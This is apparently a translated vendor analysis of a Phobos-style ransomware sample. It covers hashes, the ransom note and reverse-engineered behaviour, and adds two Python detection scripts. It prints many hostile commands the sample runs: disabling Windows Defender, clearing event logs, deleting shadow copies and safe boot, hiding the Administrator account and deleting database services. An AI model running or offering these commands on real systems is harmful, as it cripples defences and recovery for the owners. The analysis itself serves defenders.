01. Background
1.1 Preface
The new version of the TargetOwner ransomware has also upgraded its encryption approach.
The operators change the file extension frequently; the extensions the team has captured recently are mostly ".pings", ".phobos", ".annoy" and ".Kastaneya". The encryptor uses the FileControls.changePathName function to rename each encrypted file to the form UUID + encrypted-file extension and writes the result back to the FullName variable of the fileinfo object.
For example, the original file name "document.docx" becomes "123e4567-e89b-12d3-a456-426614174000.phobos".
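The renaming scheme above (implemented by the FileControls.changePathName function described in section 4.13) destroys the original file names, but it also gives responders a precise signature for scoping an incident: a UUID stem plus one of the captured extensions, with an INFOR.txt ransom note in each affected directory (section 3.1). The Python below is an added example written for this article, not code from the sample or from the team; the extension set and the note name are those the article reports, the function names are mine, and the file paths are constructed.

```python
"""Inventory files renamed to UUID + extension and locate ransom notes.

Added example for this article, not the sample's or the team's code.
The extensions and the note name INFOR.txt come from the article; the
sample paths below are constructed for the demonstration.
"""
import ntpath
import re
from collections import Counter

# Extensions the article's authors observed (compared case-insensitively).
KNOWN_EXTENSIONS = {"pings", "phobos", "annoy", "kastaneya"}
RANSOM_NOTE = "infor.txt"

# 8-4-4-4-12 hex groups, the shape .NET's Guid.ToString() produces.
UUID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$",
    re.IGNORECASE,
)

# Constructed listing of a hit file share (not real victim data).
SAMPLE_PATHS = [
    r"D:\Finance\123e4567-e89b-12d3-a456-426614174000.phobos",
    r"D:\Finance\9f1c2b3a-4d5e-4f60-8a7b-1c2d3e4f5a6b.phobos",
    r"D:\Finance\INFOR.txt",
    r"D:\Share\Reports\5e8a0c1f-7b2d-4c3e-9f10-a1b2c3d4e5f6.Kastaneya",
    r"D:\Share\Reports\quarterly.xlsx",
    r"C:\Program Files\App\app.exe",
    r"D:\Share\Tmp\not-a-uuid-name.phobos",
]


def is_uuid(stem: str) -> bool:
    return UUID_RE.match(stem) is not None


def classify(path: str) -> str:
    """Return 'encrypted', 'ransom_note' or 'other' for one Windows path."""
    name = ntpath.basename(path)
    if name.lower() == RANSOM_NOTE:
        return "ransom_note"
    stem, ext = ntpath.splitext(name)
    # Both conditions are required: a known extension on a non-UUID stem is
    # not this sample's renaming pattern and must not inflate the count.
    if is_uuid(stem) and ext[1:].lower() in KNOWN_EXTENSIONS:
        return "encrypted"
    return "other"


def triage(paths):
    """Summarise how many files were renamed, per extension, and where notes sit."""
    by_ext = Counter()
    encrypted, note_dirs = [], set()
    for p in paths:
        kind = classify(p)
        if kind == "encrypted":
            encrypted.append(p)
            by_ext[ntpath.splitext(p)[1][1:].lower()] += 1
        elif kind == "ransom_note":
            note_dirs.add(ntpath.dirname(p))
    return {
        "encrypted_total": len(encrypted),
        "by_extension": dict(by_ext),
        "encrypted_files": encrypted,
        "note_dirs": sorted(note_dirs),
    }


if __name__ == "__main__":
    summary = triage(SAMPLE_PATHS)
    print(f"encrypted files: {summary['encrypted_total']} {summary['by_extension']}")
    for d in summary["note_dirs"]:
        print(f"ransom note found in: {d}")
```

Feed it the output of a recursive directory listing (one path per line) to get the count of renamed files per extension and the set of directories that received a note; directories with a note but no UUID-named files are worth a look, since the article notes the sample writes the note only where isCarteTitle is set.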
1.2 Source
2. Basic information on the malicious file
2.1 Basic file information
Field | Value |
---|---|
Size | 2976768 (2.84 MiB) |
Operating system | Windows(95) |
Architecture | I386 |
Mode | 32-bit |
Type | GUI |
Byte order | LE |
MD5 | c509aa60f2c8fdb3eb8e42524cae887a |
SHA256 | 1dc858b5f215ed1c0b57a4ee2a4e12792eae9c6a181d682b3c5b83f60d303f22 |
Family | TargetOwner |
2.2 Ransom note
*** PHOBOS RANSOMWARE ***
--- What happened? ---
All of your files are encrypted and stolen. Stolen data will be published soon
on our tor website. There is no way to recover your data and prevent data leakage without us
Decryption is not possible without private key. Don't waste your and our time to recover your files.
It is impossible without our help
--- Contact Us---
[email protected]
Write this ID in the title of your message
ID:
3. Analysis of the malicious file
3.1 Threat analysis
Field | Value |
---|---|
Virus family | TargetOwner |
First seen / captured and analysed | 2024.05.27 / 2024.06.01 |
Threat type | Ransomware, file-encrypting virus |
Ransomware region | Russia |
Encrypted file extension | .phobos |
Ransom note file name | INFOR.txt |
Free decryptor available? | No |
Contact e-mail | [email protected] |
Detection names | Avast (Win32:RansomX-gen [Ransom]), AhnLab-V3 (Ransomware/Win.Ransom.C5011664), AliCloud (RansomWare), Avira (no cloud) (HEUR/AGEN.1319014), BitDefenderTheta (Gen:NN.ZexaF.36802.muW@a83MUGci), ClamAV (Win.Ransomware.Rapid-9371249-0), Cybereason (Malicious.0fe686), Cynet (Malicious (score: 100)), DrWeb (Trojan.Encoder.37869), eScan (Trojan.GenericKD.70329037) |
Infection symptoms | Files stored on the computer can no longer be opened; previously working files now carry a different extension (.phobos). Every encrypted folder contains a ransom note (INFOR.txt). The price the criminals demand varies from victim to victim. |
Infection vectors | Infected e-mail attachments (macros), malvertising, exploitation of vulnerabilities |
Impact | Most files (excluding exe, dll and similar files, and important system files) are encrypted and cannot be opened unless the ransom is paid. The attackers claim to have taken important data from the machine and threaten to publish it on their blog if the ransom is not paid. |
3.2 Before and after encryption
After encryption
After decryption
4. Reverse analysis
4.1 Program architecture:
4.2 Initialization entry (Program.main function):
- "ru": Russian
- "be": Belarusian
- "uk": Ukrainian
- "uz": Uzbek
- "kk": Kazakh
- "tg": Tajik
- "ka": Georgian
- "ky": Kyrgyz
- "tk": Turkmen
If any one of the above conditions is met, the program does not start.
4.3 Stopping the services listed in KillService (startManagementProcess function):
cmd.exe /c sc stop *sql*
cmd.exe /c wevtutil cl security
cmd.exe /c wevtutil cl system
cmd.exe /c wevtutil cl applocation
cmd.exe /c taskkill /f /im sqlservr.exe
cmd.exe /c sc stop MSSQLSERVER
cmd.exe /c sc delete MSSQLSERVER
cmd.exe /c sc stop MSSQLServerADHelper100
cmd.exe /c sc delete MSSQLServerADHelper100
cmd.exe /c sc stop MSSQLFDLauncher
cmd.exe /c sc delete MSSQLFDLauncher
cmd.exe /c sc stop SQLBrowser
cmd.exe /c sc delete SQLBrowser
cmd.exe /c sc stop SQLWriter
cmd.exe /c sc delete SQLWriter
cmd.exe /c sc stop SQLSERVERAGENT
cmd.exe /c sc delete SQLSERVERAGENT
cmd.exe /c taskkill /f /im oracle.exe
cmd.exe /c sc stop OracleServiceORCL
cmd.exe /c sc delete OracleServiceORCL
cmd.exe /c sc stop OracleOraDb11g_home1TNSListener
cmd.exe /c sc delete OracleOraDb11g_home1TNSListener
cmd.exe /c sc stop OracleOraDb11g_home1ClrAgent
cmd.exe /c sc delete OracleOraDb11g_home1ClrAgent
cmd.exe /c sc stop OracleMTSRecoveryService
cmd.exe /c sc delete OracleMTSRecoveryService
cmd.exe /c sc stop OracleJobSchedulerORCL
cmd.exe /c sc delete OracleJobSchedulerORCL
cmd.exe /c sc stop OracleDBConsoleorcl
cmd.exe /c sc delete OracleDBConsoleorcl
cmd.exe /c sc stop OracleVssWriterORCL
cmd.exe /c sc delete OracleVssWriterORCL
cmd.exe /c taskkill /f /im Mysqld.exe
cmd.exe /c sc stop Mysql
cmd.exe /c sc delete Mysql
cmd.exe /c sc stop OracleDBConsoleorcl
cmd.exe /c sc delete OracleDBConsoleorcl
cmd.exe /c taskkill /f /im notepad.exe
cmd.exe /c ReportingServecesService.exe
cmd.exe /c sc stop ReportingServecesService.exe
cmd.exe /c sc delete ReportingServecesService.exe
cmd.exe /c sc stop sqlservr.exe
cmd.exe /c sc delete sqlservr.exe
cmd.exe /c taskkill /f /im n.exe
cmd.exe /c taskkill /f /im mshta.exe
cmd.exe /c sc stop DuzonDataSafe
cmd.exe /c sc delete DuzonDataSafe
cmd.exe /c sc stop DzKeyLockService
cmd.exe /c sc delete DzKeyLockService
cmd.exe /c sc stop DzServerUpdaterService
cmd.exe /c sc delete DzServerUpdaterService
cmd.exe /c sc stop DzKeyLockDotNetService
cmd.exe /c sc delete DzKeyLockDotNetService
cmd.exe /c sc stop MSSQLFDLauncher
cmd.exe /c sc delete MSSQLFDLauncher
cmd.exe /c sc stop MSSQLServerOLAPService
cmd.exe /c sc delete MSSQLServerOLAPService
cmd.exe /c sc stop MsDtsServer110
cmd.exe /c sc delete MsDtsServer110
cmd.exe /c sc stop MsDtsServer120
cmd.exe /c sc delete MsDtsServer120
cmd.exe /c sc stop ReportServer
cmd.exe /c sc delete ReportServer
4.4 Stopping services on the system (StopNonSystemServices function):
4.5 Process termination (KillProcess function):
Process.GetProcesses() retrieves all currently running processes and stores them in the processes array. A while loop walks every process in processes, converts the process name to lower case and stores it in the text variable for the checks that follow. If the name starts with "ali", "safe", "360" or "hips", or contains "yun", "java", "nginx" or "python", the process is terminated. anydesk is left alone. If the process name is in the killTaskList list, the process is terminated. killTaskList contains:
"msftesql", "sqlagent", "sqlbrowser", "sqlservr", "sqlwriter", "oracle", "ocssd", "dbsnmp", "synctime", "mydesktopqos", "isqlplussvc", "xfssvccon",
"mydesktopservice", "ocautoupds", "agntsvc", "encsvc", "firefoxconfig", "tbirdconfig", "ocomm", "mysqld", "mysqld-nt", "mysqld-opt", "dbeng50", "sqbcoreservice",
"excel", "infopath", "msaccess", "mspub", "onenote", "outlook", "powerpnt", "steam", "thebat", "thebat64", "thunderbird", "visio",
"winword", "wordpad"
… in the key values of giveupDir. If the file name is among the keys of giveupDir, flag is set to true, and flag then decides whether the process is terminated; in short, any process whose file name is not under one of the giveupDir keys is terminated. giveupDir contains:
Windows\Speech_OneCore
Windows\SystemApps
Windows\ShellExperiences
Windows\servicing
Windows\System32
Windows\SysWOW64
Windows\Boot
Windows\WinSxS
Windows\assembly
Windows\Microsoft.NET
Windows\Installer
Windows\SoftwareDistribution
Windows\Prefetch
Windows\inf
Windows\Tasks
Windows\Resources
Windows\Security
Windows\ServiceProfiles
Windows\SystemResources
Windows\Web
Windows\Help
Windows\Fonts
ProgramData\Microsoft
ProgramData\NVIDIA Corporation
ProgramData\Adobe
ProgramData\Oracle
ProgramData\Dell
ProgramData\Intel
ProgramData\McAfee
ProgramData\Symantec
ProgramData\Kaspersky Lab
ProgramData\AVAST Software
ProgramData\Malwarebytes
ProgramData\Package Cache
Program Files (x86)\Internet Explorer
Program Files (x86)\Steam
Program Files (x86)\NVIDIA Corporation
Program Files (x86)\Intel
Program Files\Adobe
Program Files\Internet Explorer
Program Files\Mozilla Firefox
Program Files\Google
Program Files\NVIDIA Corporation
Program Files\WindowsApps
Program Files\Windows Defender
Program Files\Intel
Program Files\Windows Photo Viewer
Program Files\Windows Media Player
Program Files\UNP
Program Files\ModifiableWindowsApps
Program Files(x86)\Microsoft Synchronization Services
Program Files(x86)\Microsoft Sync Framework
Program Files(x86)\Microsoft Analysis Services
Program Files (x86)\Microsoft SDKs
Program Files (x86)\MSBuild
Program Files (x86)\Reference Assemblies
Program Files\Microsoft Sync Framework
Program Files\Microsoft.NET
Program Files\Reference Assemblies
Program Files\WindowsPowerShell
Program Files\MSBuild
Program Files\Virtio-Win
Program Files\Windows NT
Program Files (x86)\Microsoft.NET
Program Files (x86)\Windows NT
Program Files (x86)\WindowsPowerShell
Program Files (x86)\Windows Media Player
"cmd.exe", "/c net stop wscsvc" are passed as its arguments, and its properties are set to use shell execute, show no window, and redirect program output to Stdout.
4.5.1 First thread:
A thread is created that uses the CreateProcess function and the ExecutePowerShellScript function to run a series of commands.
4.5.1.1 Commands executed via CreateProcess
1. Disable write caching:
ManagementProcess.CreateProcess("cmd.exe", "/c 'fsutil behavior set disablewritecache 1'");
2. Disable delete notifications:
ManagementProcess.CreateProcess("cmd.exe", "/c 'fsutil behavior set disabledeletenotify 1'");
3. Disk cleanup:
ManagementProcess.CreateProcess("cmd.exe", "/c 'cleanmgr /d C:'");
4. Modify the registry to raise the maximum concurrency (MaxMpxCt):
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f'");
5. Disable the Security Health Service:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f'");
6. Delete the Windows Defender policy registry key:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f'");
7. Disable Windows Defender AntiSpyware and AntiVirus:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f'");
8. Disable the Windows Defender API Logger:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f'");
9. Disable the screen saver:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 0 /f'");
10. Disable the Windows Defender service:
ManagementProcess.CreateProcess("cmd.exe", "/c 'sc config WinDefend start=disabled'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'sc stop WinDefend'");
11. Remove Windows Defender definitions:
ManagementProcess.CreateProcess("cmd.exe", "/c 'MpCmdRun.exe -RemoveDefinitions -All'");
12. Set the power configuration:
ManagementProcess.CreateProcess("cmd.exe", "/c 'powercfg /setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'powercfg /setacvalueindex SCHEME_CURRENT SUB_PROCESSOR PERFEPP 100'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'powercfg /setacvalueindex SCHEME_CURRENT SUB_PROCESSOR PERFEPP 0'");
13. Change the desktop background colour and window border colour:
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKCU\Control Panel\Colors" /v Background /t REG_SZ /d 255 0 0 /f'");
ManagementProcess.CreateProcess("cmd.exe", "/c 'reg add "HKCU\Control Panel\Desktop\WindowMetrics" /v BorderColor /t REG_SZ /d 255 0 0 /f'");
14. Delete the safe boot configuration:
ManagementProcess.CreateProcess("cmd.exe", "/c 'bcdedit /deletevalue {current} safeboot'");
4.5.1.2 Commands executed via ExecutePowerShellScript
1. Disable real-time protection:
ManagementProcess.ExecutePowerShellScript("Set-MpPreference -DisableRealtimeMonitoring $true");
2. Add a Windows Defender exclusion path:
ManagementProcess.ExecutePowerShellScript("Add-MpPreference -ExclusionPath C:\");
ManagementProcess.ExecutePowerShellScript("Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus");
3. Disable IOAV protection and script scanning:
ManagementProcess.ExecutePowerShellScript("Set-MpPreference -DisableIOAVProtection $true");
ManagementProcess.ExecutePowerShellScript("Set-MpPreference -DisableScriptScanning 1");
4. Remove Windows Defender definitions:
ManagementProcess.ExecutePowerShellScript("&"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All");
ManagementProcess.ExecutePowerShellScript("&"C:\Program Files\Windows Defender\Mp
After the above commands have run, the DisableWindowsDefenderProtection function is executed to turn off Windows Defender and the Windows Security Center.
4.5.2 Second thread:
4.5.2.1 Deleting autostart files (sellNotInWindowsDirectory function):
4.5.2.2 Stopping scheduled tasks (StopAllScheduledTasks function):
4.5.2.3 Disabling .NET logging (DisableDotNetLogging function):
Disables certain .NET logging features. Environment.OSVersion.Version.Major is used to obtain the system version and determine whether the system is Windows 10/7/XP/Vista, the corresponding .NET registry location is selected, and the following registry values are set to 0:
- GeneratePublisherEvidence: disables generation of assembly publisher evidence.
- LegacyUnhandledExceptionPolicy: specifies the policy for handling unhandled exceptions in legacy .NET applications.
- LegacyImpersonationPolicy: specifies the impersonation policy for legacy .NET applications.
- ShadowCopyVerifyByTimestamp: disables verifying assemblies in the shadow copy cache by timestamp.
- AlwaysFlowImpersonationPolicy: disables the always-flow impersonation policy.
4.5.2.4 Disabling virtual memory (DisableVirtualMemory function):
Implemented by setting the value DisablePagingExecutive under SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management to 1.
4.5.2.5 Turning off Windows Defender real-time protection (DisableRealTimeProtection function):
Implemented by setting DisableRealtimeMonitoring under SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection to 1.
4.5.2.6 Deleting system restore points (DeleteAllRestorePoints function):
Get-WmiObject -Namespace "root\default" -Class SystemRestore
4.5.2.7 Deleting all shadow copies (DeleteAllShadowCopies function):
Implemented with the command vssadmin delete shadows /all /quiet, which shows no deletion prompt.
4.5.2.8 Preventing system sleep (sysNotSleep function):
4.5.2.9 Deleting the user's recently used items (clearRecent function):
Deletes the user's recently used files and folders: Environment.SpecialFolder.Recent is used to obtain the user's recent items, which are then deleted in a loop by calling Delete.
4.5.2.10 Deleting entries from the Windows Remote Desktop Connection client (clearRdpMru function):
Deletes the values named MRU+number under the registry key HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default.
4.5.2.11 Disabling file sharing (DisableFileSharing function):
Disables file sharing by setting the AutoShareWks and AutoShareServer values under the SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters registry key to 0.
- C:\Windows\System32\Winevt\Logs: event log files
- C:\Windows\System32\LogFiles\HTTPERR: HTTP error log files
- C:\Windows\System32\LogFiles\WMI\RtBackup: WMI real-time backup logs
- C:\Windows\System32\LogFiles\Scm: Service Control Manager logs
- C:\Windows\Prefetch: prefetch directory
- C:\Windows\Temp: temporary files directory
4.5.2.12 Deleting temporary directories and clearing logs (delDirectory function):
- C:\Windows\Prefetch: prefetch directory
- C:\Windows\Temp: temporary files directory
4.5.2.13 Commands executed via CreateProcess
1. Empty the working set memory of processes:
cmd /c EmptyWorkingSet
2. Flush the DNS cache:
cmd /c ipconfig /flushdns
3. Delete all ARP cache entries:
cmd /c arp -d *
4. Free memory:
cmd /c freemem
4.6 Self-deletion of the sample (DeleteItself function):
:del
del "AutoStart.appAllPath"
if exist "AutoStart.appAllPath" goto del
del %0
4.7 Encryptor initialization (getUidAndPublicKey function)
4.8 Reading the configuration file && initializing encryption variables (RSAartifact.fileBytePublicEncryData function):
4.9 Obfuscating the configuration file contents && deleting the configuration file (RSAartifact.shatterFile function):
4.10 Encryption thread queue initialization (QueueThread.init function):
4.11 Thread start method (CallToChildThread function):
4.12 Encryption initialization (encrySignificantFile function):
4.13 Encrypted file name generation (FileControls.changePathName function):
4.14 File encryption (FileControls.AesEncryptFile function):
"h5", "dcm", "shp", "ndf", "shx", "orc", "parquet", "prj", "id", "dat", "geojson", "kml",
"nds", "pmml", "proto", "nmea", "s57", "rpf", "onnx", "pt", "pb", "csv", "eml", "ghost",
"log", "bak", "sql", "4dd", "4dl", "abs", "abx", "frm", "accdb", "accdc", "ctl", "accde",
"pqsql", "adb", "adf", "dmp", "ckp", "db", "json", "pgdump", "arc", "pgdata", "db-journal", "db-shm",
"ifx", "js", "wal", "mongodb", "ns", "wt", "rdb", "mariadb", "db-wal", "db2", "ibd", "db3",
"dbc", "dbf", "dbs", "dbt", "dbv", "dcb", "doc", "docx", "dp1", "aof", "mysql", "myi",
"data", "dump", "eco", "edb", "database", "ora", "epim", "wdb", "fcd", "gdb", "mdb", "mdf",
"ldf", "myd", "ndf", "nwdb", "nyf", "sqlitedb", "sqlite3", "sqlite", "xls", "xlsx", "pdf", "pst",
"swift", "fix", "flt", "fixm", "xlsm", "makop", "pgp", "gpg", "enc"
4.15 Computing the encryption block size (getReadSize function):
Variable | Value | Hex |
---|---|---|
FileControls.maxFileLength | 53687091200L | 0xc80000000 |
FileControls.minFileLength | 10485760L | 0xa00000 |
FileControls.mbFileLength | 314572800L | 0x12c00000 |
FileControls.gbFileLength | 1073741824L | 0x40000000 |
4.15.1 Not in completeSuffix (encryptRate = 1):
4.15.2 In completeSuffix (encryptRate = 4):
4.16 Starting encryption
4.16.1 Initialization:
4.16.2 Encryption flow:
4.16.3 Core encryption implementation:
4.16.3.1 Key generation (FileControls.initRandomKey function):
4.16.3.2 Content encryption (chaCha7539Engine.ProcessBytes function):
Parameter | Meaning |
---|---|
inBytes | data to be encrypted |
inoff | flag used in the validity check |
len | length of the data to be encrypted |
outBytes | encrypted output data |
outoff | flag used in the validity check |
4.17 Main entry (EncryMain.start function):
Files under the paths C:\Windows\System32\winevt\Logs, C:\Windows\System32\LogFiles\WMI\RtBackup and C:\Windows\System32\LogFiles\Scm are searched for files suitable for encryption; no ransom note is written there and no file size limit is applied.
Running "cmd.exe", "/c taskkill /f /im " + current process name forcibly terminates the currently running process, i.e. the sample kills its own process. Process.GetCurrentProcess().Kill then terminates the sample's own process a second time, a double guarantee that the current process is gone.
4.17.1 Creating the encryption directory && moving files (moveErgodicDir function):
4.17.2 Validating files && enqueueing them (ergodicFiles function):
Parameter | Meaning |
---|---|
path | path to process |
size | minimum size of files to encrypt |
queueKey | enqueue key; whether it is Null decides between TaskQueue and dictionaryTaskQueue |
isCarteTitle | ransom note switch; if True, a ransom note is written in the directory |
Directory name list:
"mozilla", "msocache", "Windows", "appdata", "programdata", "google", "application data", "tor browser", "system volume information", "intel", "boot", "$windows.~ws",
"$windows.~bt", "Windows Microsoft.NET", "WindowsPowerShell", "Windows NT", "Microsoft Security Client", "Internet Explorer", "Reference", "Assemblies", "Windows Defender", "Microsoft ASP.NET", "Core Runtime", "Package",
"Store", "Microsoft Help Viewer", "Microsoft MPI", "Windows Kits", "Microsoft.NET", "Windows Mail", "Microsoft Security Client", "Package Store", "Microsoft Analysis Services", "Windows Portable Devices", "Windows Photo Viewer", "Windows Sidebar"

Extension list:
"iso", "cmd", "com", "bat", "diagpkg", "dll", "exe", "hlp", "icl", "icns", "ico", "ics",
"idx", "lnk", "nomedia", "rom", "rtp", "scr", "shs", "sys", "theme", "themepack", "wpx", "msi"
4.17.3 Custom encryption paths (ergodicSignificantDirectory function):
4.17.4 Clearing encryption keys && deleting system registry entries etc. (ManagementProcess.endManagementProcess function)
# Delete all values under the registry key:
"cmd.exe", "/c 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f'"
# Delete the registry key:
"cmd.exe", "/c 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f'"
# Add the registry key:
"cmd.exe", "/c 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"'"
# Delete the Default.rdp file:
"cmd.exe", "/c 'cd %userprofile%\documents && attrib Default.rdp -s -h && del Default.rdp'"
# Create a scheduled task that restarts the system every 15 minutes:
"cmd.exe", "/c 'schtasks /Create /SC MINUTE /MO 15 /TN "Restart" /TR "shutdown /r /f /t 0" /RU SYSTEM'"
# Add a registry value that hides the Administrator account:
"cmd.exe", "/c 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Administrator /t REG_DWORD /d 0 /f'"
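Taken one at a time, the commands in sections 4.3, 4.5.1, 4.5.2.7 and this section are unremarkable (administrators also stop services, clear logs and edit the registry), so detection should correlate several distinct tamper categories on one host within a short time rather than alert on each command. The Python below is an added example written for this article, not the team's tooling or the sample's code: it parses constructed process-creation records (a simplified key=value shape, an assumption, not a real sensor format), matches the command-line patterns this article documents, and flags hosts that show three or more categories.

```python
"""Correlate the defence-evasion and anti-recovery command lines this article
documents. Added example, not the sample's or the team's code; the records in
LOG are constructed, not real telemetry."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Patterns derived from sections 4.3, 4.5.1, 4.5.2.7 and 4.17.4 of the article,
# matched against the lower-cased command line.
RULES = [
    ("event_log_cleared",            re.compile(r"\bwevtutil\s+cl\b")),
    ("service_deleted",              re.compile(r"\bsc\s+delete\b")),
    ("shadow_copies_deleted",        re.compile(r"\bvssadmin\s+delete\s+shadows\b")),
    ("safeboot_removed",             re.compile(r"\bbcdedit\s+/deletevalue\s+\{current\}\s+safeboot\b")),
    ("defender_policy_tamper",       re.compile(r"windows defender.*\bdisableanti(spyware|virus)\b")),
    ("defender_realtime_off",        re.compile(r"set-mppreference\s+-disablerealtimemonitoring\b")),
    ("defender_definitions_removed", re.compile(r'mpcmdrun(\.exe)?"?\s+-removedefinitions\b')),
    ("scheduled_forced_reboot",      re.compile(r"\bschtasks\s+/create\b.*\bshutdown\s+/r\b")),
    ("admin_account_hidden",         re.compile(r"specialaccounts\\userlist\b.*\badministrator\b")),
    ("rdp_history_wiped",            re.compile(r"terminal server client\\(default|servers)\b")),
]

# Simplified record shape (assumed): timestamp host= ppid= pid= cmdline=<rest of line>.
EVENT_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+ppid=(?P<ppid>\d+)\s+pid=(?P<pid>\d+)\s+cmdline=(?P<cmdline>.*)$"
)

# Constructed records: one host showing the article's sequence, two hosts with benign noise.
LOG = r"""
2024-06-01T10:00:01Z host=WS01 ppid=3988 pid=4120 cmdline=cmd.exe /c wevtutil cl security
2024-06-01T10:00:01Z host=WS01 ppid=3988 pid=4124 cmdline=cmd.exe /c sc delete MSSQLSERVER
2024-06-01T10:00:02Z host=WS01 ppid=3988 pid=4130 cmdline=cmd.exe /c 'bcdedit /deletevalue {current} safeboot'
2024-06-01T10:00:02Z host=WS01 ppid=3988 pid=4133 cmdline=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
2024-06-01T10:00:05Z host=WS01 ppid=3988 pid=4140 cmdline=vssadmin delete shadows /all /quiet
2024-06-01T10:02:00Z host=WS01 ppid=3988 pid=4151 cmdline=cmd.exe /c 'schtasks /Create /SC MINUTE /MO 15 /TN "Restart" /TR "shutdown /r /f /t 0" /RU SYSTEM'
2024-06-01T10:02:01Z host=WS01 ppid=3988 pid=4160 cmdline=cmd.exe /c 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Administrator /t REG_DWORD /d 0 /f'
2024-06-01T10:03:00Z host=WS02 ppid=812 pid=2201 cmdline=cmd.exe /c ipconfig /flushdns
2024-06-01T10:04:00Z host=WS03 ppid=900 pid=3100 cmdline=cmd.exe /c sc delete OldAgentSvc
"""


@dataclass(frozen=True)
class Finding:
    ts: str
    host: str
    pid: int
    rule: str
    cmdline: str


def parse_event(line):
    """Return the record fields as a dict, or None for lines that do not match."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["pid"], d["ppid"] = int(d["pid"]), int(d["ppid"])
    return d


def match_rules(cmdline):
    """Names of every rule whose pattern occurs in the command line."""
    text = cmdline.lower()
    return [name for name, rx in RULES if rx.search(text)]


def scan(log_text):
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        for rule in match_rules(ev["cmdline"]):
            findings.append(Finding(ev["ts"], ev["host"], ev["pid"], rule, ev["cmdline"]))
    return findings


def suspicious_hosts(findings, threshold=3):
    """Hosts with at least `threshold` distinct tamper categories -> sorted rule names."""
    per_host = defaultdict(set)
    for f in findings:
        per_host[f.host].add(f.rule)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= threshold}


if __name__ == "__main__":
    found = scan(LOG)
    for f in found:
        print(f"{f.ts} {f.host} pid={f.pid} {f.rule}: {f.cmdline}")
    for host, rules in suspicious_hosts(found).items():
        print(f"ALERT {host}: {len(rules)} distinct tamper categories -> {', '.join(rules)}")
```

WS03's lone `sc delete` is reported as a finding but does not raise an alert, which is the intended behaviour: the alert fires on WS01, where seven categories appear within two minutes, matching the sequence the article describes. In production the per-host set would be bounded by a time window, and the shared parent pid (3988 in the constructed data) is the next pivot for the responder.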
4.17.5 Scheduling a system restart (ScheduleRestartAndExit function):
5. Analysis overview
6. Countermeasures
7. Security recommendations
7.1 Risk reduction measures
Asset inventory and review targets: review internal and external network assets in phases according to the actual situation
Service approach: research interviews, on-site inspection, tool-based scanning
Key service content: traffic threat monitoring system review, internet exposure surface scanning, technical hardening, review of centralized privileged management systems
7.2 Security device tuning
Objective
Main target devices
7.3 Company-wide security awareness improvement
Objective:
Format:
Offline training schedule
1. Provide security awareness training materials, distributed top-down for study
2. Organize online meetings for the relevant staff to study (online training mode).
Online learning platform
8. About the team
9. Data recovery service process
① Free consultation / data diagnosis
Professional pre-sales technical consultants provide free online consultation so that the correct handling steps can be obtained as soon as data has been hit, preventing the ransomware from spreading further across the internal network or executing a second time, and avoiding mistakes that would make the data unrecoverable.
The pre-sales consultant gathers information about the infected machine, compares it against identical cases in the team's data recovery case library, and gives an initial assessment of how the affected data has been encrypted or damaged.
② Assessment and quotation / data recovery plan
Once you have received the consultant's initial assessment and agree to a more thorough data recovery diagnosis, we immediately assign a malware analyst and a data recovery engineer to reverse engineer the malware and analyse the data for recoverability.
Based on the analysis results, the data recovery engineer prepares a tailored recovery plan (price, recovery rate, time frame) and answers your questions about it.
③ Order confirmation / contract signing
Once you fully understand the recovery plan, you may choose the following way to place an order:
The two parties sign a corporate contract: a data recovery contract is drawn up for the specific case, stating the scope of recovery, the recovery rate, the time frame and the rights and obligations of both sides. After signing, the professional recovery work begins; once the recovered data has been verified as correct, the transaction is complete.
④ Professional data recovery work begins
A team of data recovery engineers provides end-to-end service, informs the client of precautions and measures during the recovery process, and, depending on the client's needs and the state of the data, performs the recovery on-site or remotely.
During the recovery, the team reports progress at every stage (data scanning → data inspection → data confirmation → custom recovery tooling → recovery execution → integrity confirmation).
⑤ Data acceptance / security defence plan
